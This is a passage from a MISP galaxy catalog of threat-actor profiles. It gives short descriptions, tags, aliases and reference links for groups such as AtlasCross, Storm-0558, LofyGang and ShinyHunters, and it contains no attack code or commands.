https://www.loginradius.com/blog/identity/oktapus-phishing-targets-okta-identity-credentials/

https://www.attackiq.com/2023/11/21/attack-graph-response-to-cisa-advisory-aa23-320a/

https://www.mandiant.com/resources/blog/unc3944-sms-phishing-sim-swapping-ransomware

AtlasCross

NSFOCUS Security Labs recently discovered a new attack process based on phishing documents in their daily threat-hunting operations. Delving deeper into this finding through extensive research, they confirmed two new Trojan horse programs and many rare attack techniques and tactics. NSFOCUS Security Labs believes that this new attack process comes from a new APT attacker, who has a high technical level and cautious attack attitude. The phishing attack activity captured this time is part of the attacker’s targeted strike on specific targets and is its main means to achieve in-domain penetration. NSFOCUS Security Labs validated the high-level threat attributes of AtlasCross in terms of development technology and attack strategy through an in-depth analysis of its attack metrics. At this current stage, AtlasCross has a relatively limited scope of activity, primarily focusing on targeted attacks against specific hosts within a network domain. However, the attack processes they employ are highly robust and mature. NSFOCUS Security Labs deduce that this attacker is highly likely to deploy this attack process into larger-scale network attack operations.

The tag is: misp-galaxy:threat-actor="AtlasCross"

AtlasCross has relationships with:

  • uses: misp-galaxy:tool="DangerAds" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:tool="AtlasAgent" with estimative-language:likelihood-probability="likely"

Table 12184. Table References

Links

https://nsfocusglobal.com/warning-newly-discovered-apt-attacker-atlascross-exploits-red-cross-blood-drive-phishing-for-cyberattack/

Void Rabisu

Void Rabisu is an intrusion set associated with both financially motivated ransomware attacks and targeted campaigns on Ukraine and countries supporting Ukraine.

The tag is: misp-galaxy:threat-actor="Void Rabisu"

Void Rabisu is also known as:

  • Tropical Scorpius

Void Rabisu has relationships with:

  • uses: misp-galaxy:malpedia="Cuba" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:malpedia="ROMCOM RAT" with estimative-language:likelihood-probability="likely"

Table 12185. Table References

Links

https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html

https://www.trendmicro.com/en_za/research/23/e/void-rabisu-s-use-of-romcom-backdoor-shows-a-growing-shift-in-th.html

Camaro Dragon

In early 2023, the Check Point Incident Response Team (CPIRT) team investigated a malware incident at a European healthcare institution involving a set of tools mentioned in the Avast report in late 2022. The incident was attributed to Camaro Dragon, a Chinese-based espionage threat actor whose activities overlap with activities tracked by different researchers as Mustang Panda and LuminousMoth, whose focus is primarily on Southeast Asian countries and their close peers.

The tag is: misp-galaxy:threat-actor="Camaro Dragon"

Table 12186. Table References

Links

https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/

https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/

Storm-0558

Storm-0558 is a China-based threat actor with espionage objectives. While there are some minimal overlaps with other Chinese groups such as Violet Typhoon (ZIRCONIUM, APT31), Microsoft maintains high confidence that Storm-0558 operates as its own distinct group.

The tag is: misp-galaxy:threat-actor="Storm-0558"

Table 12187. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/07/14/analysis-of-storm-0558-techniques-for-unauthorized-email-access/

https://www.wiz.io/blog/storm-0558-compromised-microsoft-key-enables-authentication-of-countless-micr

https://msrc.microsoft.com/blog/2023/09/results-of-major-technical-investigations-for-storm-0558-key-acquisition/

Scarred Manticore

Scarred Manticore has been pursuing high-value targets for years, utilizing a variety of IIS-based backdoors to attack Windows servers. These include a variety of custom web shells, custom DLL backdoors, and driver-based implants.

The tag is: misp-galaxy:threat-actor="Scarred Manticore"

Table 12188. Table References

Links

https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/

Xiaoqiying

Xiaoqiying is a primarily Chinese-speaking threat group that is most well known for conducting website defacement and data exfiltration attacks on more than a dozen South Korean research and academic institutions in late January 2023. Research from Recorded Future’s Insikt Group has found that the group’s affiliated threat actors have signaled a new round of cyberattacks against organizations in Japan and Taiwan. Although it shows no clear ties to the Chinese government, Xiaoqiying is staunchly pro-China and vows to target NATO countries as well as any country or region that is deemed hostile to China.

The tag is: misp-galaxy:threat-actor="Xiaoqiying"

Xiaoqiying is also known as:

  • Genesis Day

  • Teng Snake

Table 12190. Table References

Links

https://www.recordedfuture.com/xiaoqiying-genesis-day-threat-actor-group-targets-south-korea-taiwan

https://medium.com/s2wblog/%E5%8F%98%E8%84%B8-teng-snake-a-k-a-code-core-8c35268b4d1a

https://therecord.media/samsung-investigating-claims-of-hack-on-south-korea-systems-internal-employee-platform/

UNC3886

UNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns. UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support. Their ability to manipulate firewall firmware and exploit a zero-day indicates they have curated a deeper level of understanding of such technologies. UNC3886 has modified publicly available malware, specifically targeting *nix operating systems.

The tag is: misp-galaxy:threat-actor="UNC3886"

Table 12192. Table References

Links

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

https://www.mandiant.com/resources/blog/esxi-hypervisors-malware-persistence

https://www.mandiant.com/resources/blog/vmware-esxi-zero-day-bypass

https://www.mandiant.com/resources/blog/vmware-detection-containment-hardening

Earth Longzhi

Earth Longzhi is a subgroup of APT41 targeting organizations based in Taiwan, Thailand, the Philippines, and Fiji, and using “stack rumbling” via Image File Execution Options (IFEO), a new denial-of-service (DoS) technique to disable security software.

The tag is: misp-galaxy:threat-actor="Earth Longzhi"

Earth Longzhi is also known as:

  • SnakeCharmer

Table 12193. Table References

Links

https://www.picussecurity.com/resource/blog/cyber-threat-intelligence-report-may-2023

https://www.trendmicro.com/en_us/research/23/e/attack-on-security-titans-earth-longzhi-returns-with-new-tricks.html

https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/

https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html

Redfly

Redfly hacked a national electricity grid organization in Asia and maintained persistent access to the network for about six months. Researchers discovered evidence for this attack between 28 February and 3 August 2023 after noticing suspicious malware activity within the organization’s network.

The tag is: misp-galaxy:threat-actor="Redfly"

Table 12194. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/critical-infrastructure-attacks

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-power-suppliers-network-infiltrated-for-6-months-by-redfly-hackers-active-iocs/

TetrisPhantom

TetrisPhantom relies on compromising a certain type of secure USB drive that provides hardware encryption and is commonly used by government organizations. While investigating this threat, experts identified an entire spying campaign that uses a range of malicious modules to execute commands, collect files and information from compromised computers, and transfer them to other machines, also using secure USB drives.

The tag is: misp-galaxy:threat-actor="TetrisPhantom"

Table 12195. Table References

Links

https://usa.kaspersky.com/blog/sas-2023-research/29254/

https://securelist.com/apt-trends-report-q3-2023/110752/

Earth Estries

Trend Micro found that Earth Estries relies heavily on DLL sideloading to load various tools within its arsenal. Aside from the backdoors previously mentioned, this intrusion set also utilizes commonly used remote control tools like Cobalt Strike, PlugX, or Meterpreter stagers interchangeably in various attack stages. These tools come as encrypted payloads loaded by custom loader DLLs.

The tag is: misp-galaxy:threat-actor="Earth Estries"

Table 12196. Table References

Links

https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html

https://www.sentinelone.com/labs/cyber-soft-power-chinas-continental-takeover/

GoldenJackal

GoldenJackal activity is characterized by the use of compromised WordPress websites as a method to host C2-related logic. Kaspersky believes the attackers upload a malicious PHP file that is used as a relay to forward web requests to another backbone C2 server. They developed a collection of .NET malware tools known as Jackal.

The tag is: misp-galaxy:threat-actor="GoldenJackal"

Table 12197. Table References

Links

https://securelist.com/it-threat-evolution-q2-2023/110355/

https://securelist.com/goldenjackal-apt-group/109677/

Lancefly

Lancefly targets government, aviation, and telecom organizations in South and Southeast Asia. They use a custom backdoor named Merdoor, developed since 2018, and employ various tactics to gain access, including phishing emails, SSH credential brute-forcing, and exploiting server vulnerabilities. Additionally, Lancefly has been observed using a newer version of the ZXShell rootkit and tools like PlugX and ShadowPad RAT, which are typically associated with Chinese-speaking APT groups.

The tag is: misp-galaxy:threat-actor="Lancefly"

Table 12198. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lancefly-merdoor-zxshell-custom-backdoor

LofyGang

LofyGang has been found to be linked to more than 200 malicious packages, with thousands of installations throughout 2022. The group, believed to have been operating for more than a year, has multiple hacking objectives, including stealing credit card information and stealing user accounts including Discord Inc. premium accounts, streaming services accounts such as Disney+ and Minecraft accounts.

The tag is: misp-galaxy:threat-actor="LofyGang"

Table 12199. Table References

Links

https://checkmarx.com/blog/lofygang-software-supply-chain-attackers-organized-persistent-and-operating-for-over-a-year/

Storm-0062

The cyberattack campaign that Microsoft uncovered was launched by a China-linked hacking group called Storm-0062. According to the company, the group is launching cyberattacks by exploiting a vulnerability in the Data Center and Server editions of Confluence. Those are versions of the application that companies run on-premises.

The tag is: misp-galaxy:threat-actor="Storm-0062"

Storm-0062 is also known as:

  • Oro0lxy

  • DarkShadow

Table 12200. Table References

Links

https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/monthly-news-november-2023/ba-p/3970796

https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-41-5/

https://twitter.com/MsftSecIntel/status/1711871732644970856

SparklingGoblin

ESET researchers have discovered a new undocumented modular backdoor, SideWalk, being used by an APT group they’ve named SparklingGoblin; this backdoor was used during one of SparklingGoblin’s recent campaigns that targeted a computer retail company based in the USA. This backdoor shares multiple similarities with another backdoor used by the group: CROSSWALK.

The tag is: misp-galaxy:threat-actor="SparklingGoblin"

Table 12201. Table References

Links

https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/

Kasablanka

The Kasablanka group is a cyber-criminal organization that has specifically targeted Russia between September and December 2022, using various payloads delivered through phishing emails containing socially engineered LNK files, ZIP packages, and executables attached to virtual disk image files.

The tag is: misp-galaxy:threat-actor="Kasablanka"

Table 12202. Table References

Links

https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/

https://www.welivesecurity.com/2021/09/07/bladehawk-android-espionage-kurdish/

https://blog.talosintelligence.com/get-a-loda-this/

YoroTrooper

YoroTrooper’s main targets are government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States members, based on Cisco Talos analysis. YoroTrooper was also observed compromising accounts from at least two international organizations: a critical European Union health care agency and the World Intellectual Property Organization. Successful compromises also included Embassies of European countries including Azerbaijan and Turkmenistan.

The tag is: misp-galaxy:threat-actor="YoroTrooper"

Table 12203. Table References

Links

https://blog.talosintelligence.com/attributing-yorotrooper/

https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/

Metador

Metador primarily targets telecommunications, internet service providers, and universities in several countries in the Middle East and Africa. Metador’s attack chains are designed to bypass native security solutions while deploying malware platforms directly into memory. SentinelLabs researchers discovered variants of two long-standing Windows malware platforms, and indications of an additional Linux implant.

The tag is: misp-galaxy:threat-actor="Metador"

Table 12204. Table References

Links

https://www.sentinelone.com/labs/the-mystery-of-metador-unpicking-mafaldas-anti-analysis-techniques/

https://www.sentinelone.com/labs/the-mystery-of-metador-an-unattributed-threat-hiding-in-telcos-isps-and-universities/

SiegedSec

SiegedSec, a hacktivist collective, emerged coincidentally just days before Russia’s invasion of Ukraine. Under the leadership of the hacktivist known as “YourAnonWolf,” the group swiftly gained strength, announcing an increasing number of victims after its inception. The group humorously self-identifies as “gay furry hackers” and is renowned for its comical slogans and the use of vulgar language. SiegedSec has affiliations with other hacker groups like GhostSec and typically consists of members aged between 18 and 26.

The tag is: misp-galaxy:threat-actor="SiegedSec"

Table 12205. Table References

Links

https://therecord.media/nato-siegedsec-unclassified-websites-alleged-cyberattack

https://socradar.io/threat-actor-profile-siegedsec/

https://socradar.io/the-five-families-hacker-collaboration-redefining-the-game/

https://therecord.media/fort-worth-officials-say-leaked-data-was-public

https://webz.io/dwp/exclusive-hacktivists-attack-anti-abortion-u-s-states/

https://www.darkowl.com/blog-content/darkowl-threat-actor-spotlight-siegedsec-and-leaked-data/

Carderbee

Symantec recently reported on activity attributed to a threat actor group dubbed Carderbee. In the campaign, the threat actors target entities in Hong Kong and other regions of Asia via a supply chain attack leveraging the legitimate Cobra DocGuard software. The activity began as early as September 2022.

The tag is: misp-galaxy:threat-actor="Carderbee"

Table 12207. Table References

Links

https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia

https://blog.polyswarm.io/carderbee-targets-hong-kong-in-supply-chain-attack

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/carderbee-software-supply-chain-certificate-abuse

UNC3890

A suspected Iranian threat activity cluster has been linked to attacks aimed at Israeli shipping, government, energy, and healthcare organizations, in a campaign stretching back to late 2020. Researchers believe that the data harvested during the campaign could be used to support various activities. UNC3890, the threat actor behind the attacks, deployed two proprietary pieces of malware – a backdoor named “SUGARUSH” and a browser credential stealer called “SUGARDUMP”, which exfiltrates password information to email addresses registered with Gmail, ProtonMail, Yahoo and Yandex email services. The threat actor also employs a network of C&C servers that host fake login pages impersonating legitimate platforms such as Office 365, LinkedIn and Facebook. These servers are designed to communicate with the targets and also with a watering hole hosted on the login page of a legitimate Israeli shipping company.

The tag is: misp-galaxy:threat-actor="UNC3890"

Table 12208. Table References

Links

https://ics-cert.kaspersky.com/publications/reports/2023/03/24/apt-attacks-on-industrial-organizations-in-h2-2022/

https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping

RedStinger

In October 2022, Kaspersky identified an active infection of government, agriculture and transportation organizations located in the Donetsk, Lugansk, and Crimea regions. Although the initial vector of compromise is unclear, the details of the next stage imply the use of spear phishing or similar methods. The victims navigated to a URL pointing to a ZIP archive hosted on a malicious web server.

The tag is: misp-galaxy:threat-actor="RedStinger"

RedStinger is also known as:

  • Bad Magic

Table 12209. Table References

Links

https://www.malwarebytes.com/blog/threat-intelligence/2023/05/redstinger

https://securelist.com/bad-magic-apt/109087/

Witchetty

Witchetty was first documented by ESET in April 2022, who concluded that it was one of three sub-groups of TA410, a broad cyber-espionage operation with some links to the Cicada group (aka APT10). Witchetty’s activity was characterized by the use of two pieces of malware, a first-stage backdoor known as X4 and a second-stage payload known as LookBack. ESET reported that the group had targeted governments, diplomatic missions, charities, and industrial/manufacturing organizations.

The tag is: misp-galaxy:threat-actor="Witchetty"

Witchetty is also known as:

  • LookingFrog

Table 12210. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-witchetty-apt-group-active-iocs

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/

IndigoZebra

IndigoZebra is a Chinese state-sponsored actor mentioned for the first time by Kaspersky in its APT Trends report Q2 2017, targeting, at the time of its discovery, former Soviet Republics with multiple malware strains including Meterpreter, Poison Ivy, xDown, and a previously unknown backdoor called “xCaon.”

The tag is: misp-galaxy:threat-actor="IndigoZebra"

Table 12212. Table References

Links

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

https://www.rewterz.com/rewterz-news/rewterz-threat-intel-indigozebra-apt-group-targeting-central-asia-active-iocs

https://securelist.com/apt-trends-report-q2-2017/79332/

GhostSec

GhostSec is a hacktivist group that emerged as an offshoot of Anonymous. They primarily focused on counterterrorism efforts and monitoring online activities associated with terrorism. They gained prominence following the 2015 Charlie Hebdo shooting in Paris and the rise of ISIS.

The tag is: misp-galaxy:threat-actor="GhostSec"

GhostSec is also known as:

  • Ghost Security

Table 12213. Table References

Links

https://www.uptycs.com/blog/ghostlocker-ransomware-ghostsec

https://forescoutstage.wpengine.com/blog/the-increasing-threat-posed-by-hacktivist-attacks-an-analysis-of-targeted-organizations-devices-and-ttps/

OilAlpha

OilAlpha has almost exclusively relied on infrastructure associated with the Public Telecommunication Corporation (PTC), a Yemeni government-owned enterprise reported to be under the direct control of the Houthi authorities. OilAlpha used encrypted chat messengers like WhatsApp to launch social engineering attacks against its targets. It has also used URL link shorteners. Per victimology assessment, it appears a majority of the targeted entities were Arabic-language speakers and operated Android devices.

The tag is: misp-galaxy:threat-actor="OilAlpha"

Table 12214. Table References

Links

https://www.zimperium.com/blog/zimperium-mtd-against-oilalpha-a-comprehensive-defense-strategy/

https://www.recordedfuture.com/oilalpha-likely-pro-houthi-group-targeting-arabian-peninsula

HiddenArt

It was observed that a mobile network threat actor designated as ‘HiddenArt’ actively sustains a capacity to remotely access the personal devices of targeted individuals around the world on an ongoing basis. Since detecting this threat actor, periodic reconnaissance activities were observed in at least 7 target mobile networks around the world and given the wide geographic distribution of these targeted mobile operators, it is probable that the threat actor is active on a global scale.

The tag is: misp-galaxy:threat-actor="HiddenArt"

Table 12215. Table References

Links

https://www.enea.com/insights/the-hunt-for-hiddenart/

REF5961

Elastic’s security team has published a report on REF5961, a cyber-espionage group they found on the network of a Foreign Affairs Ministry from a member of the Association of Southeast Asian Nations (ASEAN). Elastic says it found the group’s tools next to the malware of another cyber-espionage group it tracks as REF2924. REF5961’s arsenal includes malware such as EAGERBEE, RUDEBIRD, and DOWNTOWN.

The tag is: misp-galaxy:threat-actor="REF5961"

Table 12216. Table References

Links

https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set

https://www.elastic.co/security-labs/disclosing-the-bloodalchemy-backdoor

REF2924

A group monitored as REF2924 by Elastic Security Labs is wielding novel data-stealing malware — an HTTP listener written in C# dubbed Naplistener by the researchers — in attacks against victims operating in southern and southeast Asia. According to a blog post by Elastic senior security research engineer Remco Sprooten, in that region of the world, network-based detection and prevention technologies are the de facto method for securing many environments.

The tag is: misp-galaxy:threat-actor="REF2924"

Table 12217. Table References

Links

https://www.elastic.co/security-labs/ref2924-howto-maintain-persistence-as-an-advanced-threat

https://www.elastic.co/security-labs/introducing-the-ref5961-intrusion-set

Storm-1133

In early 2023, Microsoft observed a wave of activity from a Gaza-based group that it tracks as Storm-1133 targeting Israeli private sector energy, defense, and telecommunications organizations.

The tag is: misp-galaxy:threat-actor="Storm-1133"

Table 12218. Table References

Links

https://www.microsoft.com/en-us/security/security-insider/microsoft-digital-defense-report-2023

https://therecord.media/hacktivists-take-sides-israel-palestinian

TA499

TA499, also known as Vovan and Lexus, is a Russia-aligned threat actor that has aggressively engaged in email campaigns since at least 2021. The threat actor’s campaigns attempt to convince high-profile North American and European government officials as well as CEOs of prominent companies and celebrities into participating in recorded phone calls or video chats.

The tag is: misp-galaxy:threat-actor="TA499"

TA499 is also known as:

  • Vovan

  • Lexus

Table 12219. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/dont-answer-russia-aligned-ta499-beleaguers-targets-video-call-requests

BadRory

Kaspersky researchers have identified a new APT group named BadRory that has mounted two waves of spear-phishing attacks against Russian organizations. The campaigns took place in October 2022 and April 2023 and leveraged booby-trapped Office emails. Targets included government entities, military contractors, universities, and hospitals.

The tag is: misp-galaxy:threat-actor="BadRory"

Table 12220. Table References

Links

https://securelist.com/apt-trends-report-q3-2023/110752/

SharpPanda

SharpPanda, an APT group originating from China, has seen a rise in its cyber-attack operations starting from at least 2018. The APT group utilizes spear-phishing techniques to obtain initial access, employing a combination of outdated Microsoft Office document vulnerabilities, novel evasion techniques, and highly potent backdoor malware.

The tag is: misp-galaxy:threat-actor="SharpPanda"

Table 12221. Table References

Links

https://blog.cyble.com/2023/06/01/sharppanda-apt-campaign-expands-its-arsenal-targeting-g20-nations/

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-sharppanda-chinese-apt-group-targets-southeast-asian-government-active-iocs

https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/

DustSquad

Prodaft researchers have published a report on Paperbug, a cyber-espionage campaign carried out by the suspected Russian-speaking group Nomadic Octopus that targeted entities in Tajikistan. According to Prodaft, known compromised victims included high-ranking government officials, telcos, and public service infrastructure. Compromised devices included OT devices in addition to conventional computers, servers, and mobile devices. As in its previous reports, Prodaft also gained access to one of the group’s C&C server backend panels.

The tag is: misp-galaxy:threat-actor="DustSquad"

DustSquad is also known as:

  • Nomadic Octopus

Table 12223. Table References

Links

https://securelist.com/octopus-infested-seas-of-central-asia/88200/

https://www.prodaft.com/m/reports/PAPERBUG_TLPWHITE-1.pdf

https://www.virusbulletin.com/conference/vb2018/abstracts/nomadic-octopus-cyber-espionage-central-asia/

KromSec

KromSec is a hacktivist group that claims to be composed of hackers, activists, writers, and journalists. The group has been involved in a number of high-profile cyberattacks, including a cyber offensive against Iran in September 2022 and the sale of the database of the Iran Ministry of Industries and Mines on a hacker forum in November 2023. KromSec’s attacks have been met with mixed reactions, but the group has quickly made a name for itself as a significant threat to governments and organizations around the world.

The tag is: misp-galaxy:threat-actor="KromSec"

Table 12224. Table References

Links

https://thecyberexpress.com/kromsec-sells-iran-ministry-database-dark-web/

https://cybershafarat.com/2022/11/17/kromsec-outs-anonopsse-as-iranian-regime-makes-statement/

Cyber Av3ngers

The hacktivist group ‘Cyber Av3ngers’ has historically claimed attacks on Israel’s critical infrastructures. It has been launching DDoS attacks and claiming breach of Israeli networks with supporting data leaks.

The tag is: misp-galaxy:threat-actor="Cyber Av3ngers"

Table 12225. Table References

Links

https://securelist.com/a-hack-in-hand-is-worth-two-in-the-bush/110794/

https://cyberwarzone.com/cyber-av3ngers-claims-infiltration-of-israeli-water-treatment-stations-amid-ongoing-conflict/

https://cyberwarzone.com/hacking-group-cyber-av3ngers-claims-responsibility-for-yavne-power-outages-what-you-need-to-know/

Altahrea Team

Altahrea Team is a pro-Iranian hacking group that has been active since at least 2020. The group has claimed responsibility for a number of cyberattacks, including DDoS attacks against Israeli websites, a hack of the Israel Airports Authority website, and a cyberattack on the Orot Yosef power plant in Israel.

The tag is: misp-galaxy:threat-actor="Altahrea Team"

Table 12226. Table References

Links

https://securelist.com/ddos-attacks-in-q2-2022/107025/

https://www.timesofisrael.com/cyberattack-on-health-ministry-website-blocks-overseas-access/

https://techmonitor.ai/technology/cybersecurity/alahrea-team-power-plant-fire-israel

https://www.presstv.ir/Detail/2022/07/27/686324/Iraqi-hacker-group--ALtahrea-Team--targets-Israeli-IT,-e-commerce-companies-with-major-cyber-attack

https://www.hackread.com/pro-iran-altahrea-hit-port-of-london-website-ddos-attack/

https://nsi-globalcounterintelligence.com/cyber-security/pro-iran-hackers-target-israel-airports-authority-website/

1937CN

1937CN is a Chinese hacking group that has been active since at least 2013. The group is known for targeting Vietnamese organizations, including government agencies, businesses, and media outlets. 1937CN has been linked to a number of high-profile cyberattacks, including the hacking of Vietnam Airlines in 2016 and the defacement of Vietnamese government websites in 2015.

The tag is: misp-galaxy:threat-actor="1937CN"

Table 12227. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/earth-zhulong-familiar-patterns-target-southeast-asian-firms.html

https://www.recordedfuture.com/international-hacktivism-analysis/

http://securityaffairs.co/wordpress/49876/hacking/china-1937cn-team-vietnam.html

https://medium.com/@Sebdraven/malicious-document-targets-vietnamese-officials-acb3b9d8b80a

ShroudedSnooper

In September 2023, Cisco Talos identified a new malware family it calls HTTPSnoop being deployed against telecommunications providers in the Middle East. Talos also discovered a sister implant to HTTPSnoop, which it named PipeSnoop, that can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. Based on these findings, the researchers assess with high confidence that both implants belong to a new intrusion set that Talos named ShroudedSnooper.

The tag is: misp-galaxy:threat-actor="ShroudedSnooper"

Table 12228. Table References

Links

https://blog.talosintelligence.com/introducing-shrouded-snooper/

https://www.sentinelone.com/labs/the-israel-hamas-war-cyber-domain-state-sponsored-activity-of-interest/

ShinyHunters

ShinyHunters is a cybercriminal group of unknown origin that is motivated by financial gain. The group is known for its sophisticated attacks against a wide range of targets, including businesses, organizations, and government agencies. ShinyHunters typically uses phishing attacks and exploit kits to gain access to victim networks, where they deploy malware to steal sensitive data, such as names, addresses, phone numbers, Social Security numbers, and credit card information.

The tag is: misp-galaxy:threat-actor="ShinyHunters"

Table 12229. Table References

Links

https://cyberwarzone.com/shinyhunters-22-year-old-member-pleads-guilty-to-cyber-extortion-causing-6-million-in-damage/

https://www.bitdefender.com/blog/hotforsecurity/pizza-hut-australia-leaks-one-million-customers-details-claims-shinyhunters-hacking-group/

https://www.justice.gov/usao-wdwa/pr/alleged-french-cybercriminal-appear-seattle-indictment-conspiracy-computer-intrusion

IronHusky

IronHusky is a China-based threat actor first reported in July 2017, targeting the Russian and Mongolian governments as well as aviation companies and research institutes. Since their initial attacks ceased in 2018, they have been working on a new remote access trojan dubbed MysterySnail.

The tag is: misp-galaxy:threat-actor="IronHusky"

Table 12230. Table References

Links

https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/

https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk175885

UserSec

UserSec is a pro-Russian hacking group that has been active since at least 2022. The group is known for its DDoS attacks and has collaborated with other pro-Russian hacking groups. In May 2023, UserSec announced a cyber campaign targeting NATO member states and joined forces with KillNet to launch attacks against NATO.

The tag is: misp-galaxy:threat-actor="UserSec"

Table 12231. Table References

Links

https://therecord.media/scandinavian-airlines-cyberattack-anonymous-sudan/

https://blog.cyble.com/2023/05/24/notable-ddos-attack-tools-and-services-supporting-hacktivist-operations-in-2023/

https://socradar.io/cyber-shadows-pact-darknet-parliament-killnet-anonymous-sudan-revil/

https://socradar.io/dark-peep-2-war-and-a-piece-of-hilarity/

UAC-0094

The State Service of Special Communication and Information Protection of Ukraine spotted a new wave of cyber attacks aimed at gaining access to users’ Telegram accounts. The Ukrainian CERT attributes the campaign to threat actors tracked as UAC-0094. The attackers send Telegram messages containing malicious links posing as the Telegram website, in order to capture the one-time code delivered by SMS and gain unauthorized access to the accounts.

The tag is: misp-galaxy:threat-actor="UAC-0094"

Table 12232. Table References

Links

https://cert.gov.ua/article/39253

https://vulners.com/thn/THN:4C1C2CD10F20E08DD74D465450DF3F17?utm_source=rss&utm_medium=rss&utm_campaign=rss

TraderTraitor

TraderTraitor targets blockchain companies through spear-phishing messages. The group sends these messages to employees, particularly those in system administration or software development roles, on various communication platforms, intended to gain access to these start-up and high-tech companies. TraderTraitor may be the work of operators previously responsible for APT38 activity.

The tag is: misp-galaxy:threat-actor="TraderTraitor"

TraderTraitor is also known as:

  • Jade Sleet

  • UNC4899

Table 12233. Table References

Links

https://www.mandiant.com/resources/blog/north-korea-supply-chain

https://us-cert.cisa.gov/ncas/alerts/aa22-108a

https://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023

TheDarkOverlord

TheDarkOverlord is a financially motivated extortion group, active since 2016, that steals data and demands payment under threat of leaking it. The group is known for targeting large organizations, including Netflix, ABC, and Miramax.

The tag is: misp-galaxy:threat-actor="TheDarkOverlord"

Table 12234. Table References

Links

https://www.databreaches.net/peachtree-orthopedics-alerts-patients-of-cyberattack-third-patient-data-breach-in-seven-years/

http://securityaffairs.co/wordpress/64782/data-breach/london-bridge-plastic-surgery-hack.html

http://www.csoonline.com/article/3193397/security/no-netflix-is-not-a-victim-of-ransomware.html

UNC2565

UNC2565 is a threat group that has used the GOOTLOADER downloader to deliver Cobalt Strike BEACON. These intrusions have stemmed from victims accessing malicious websites that use SEO techniques to improve Google search rankings. After obtaining a foothold in the environment, UNC2565 has conducted reconnaissance and credential harvesting activity using common tools such as BLOODHOUND and KERBEROAST. UNC2565’s motivations are currently unknown but overlaps with activity that has led to SODINOKIBI ransomware. This suggests that the threat group may be financially motivated.

The tag is: misp-galaxy:threat-actor="UNC2565"

UNC2565 is also known as:

  • Hive0127

Table 12235. Table References

Links

https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations

https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/

https://securityintelligence.com/x-force/gootbot-gootloaders-new-approach-to-post-exploitation/

Desorden Group

Desorden (Disorder in Spanish, previously known as ChaosCC), is a financially motivated hacker group. The group first emerged under the new name Desorden in September 2021, on Raidforums. Today the group maintains users under that name on several popular English-speaking hacking forums, where they share their attacks and ransom demands, and offer databases for sale. The group gained an excellent reputation among the cybercriminal communities due to their successful operations and the unique data that they share and offer for sale.

The tag is: misp-galaxy:threat-actor="Desorden Group"

Table 12236. Table References

Links

https://www.databreaches.net/major-malaysian-water-utilities-company-hit-by-hackers-ranhill-offline-hackers-claim-databases-and-backups-deleted/

https://www.databreaches.net/one-month-later-ranhill-still-hasnt-fully-recovered-from-cyberattack/

https://www.databreaches.net/malaysian-online-stock-brokerage-firm-victim-of-cyberattack/

https://www.databreaches.net/johnson-fitness-and-wellness-hit-by-desorden-group/

https://www.databreaches.net/thailands-the-icon-group-hacked-by-desorden/

https://www.databreaches.net/customer-data-from-hundreds-of-indonesian-and-malaysian-restaurants-hacked-by-desorden/

https://www.databreaches.net/major-indonesia-tollroad-operator-hacked-by-desorden/

https://www.databreaches.net/recent-cyberattacks-put-thai-citizens-privacy-and-data-security-at-greater-risk/

https://www.databreaches.net/thai-entities-continue-to-fall-prey-to-cyberattacks-and-leaks/

https://seclists.org/dataloss/2021/q4/81

Confucious

Confucius is an APT group assessed to be funded by India. It has been carrying out cyber attacks since 2013, mainly against India’s neighbouring countries such as Pakistan and China, with a strong interest in military, government and energy targets.

The tag is: misp-galaxy:threat-actor="Confucious"

Table 12237. Table References

Links

https://medium.com/@knownsec404team/apt-k-47-mysterious-elephant-a-new-apt-organization-in-south-asia-5c66f954477

https://blog.nsfocus.net/aptconfuciuspakistanibo/

Kiss-a-Dog

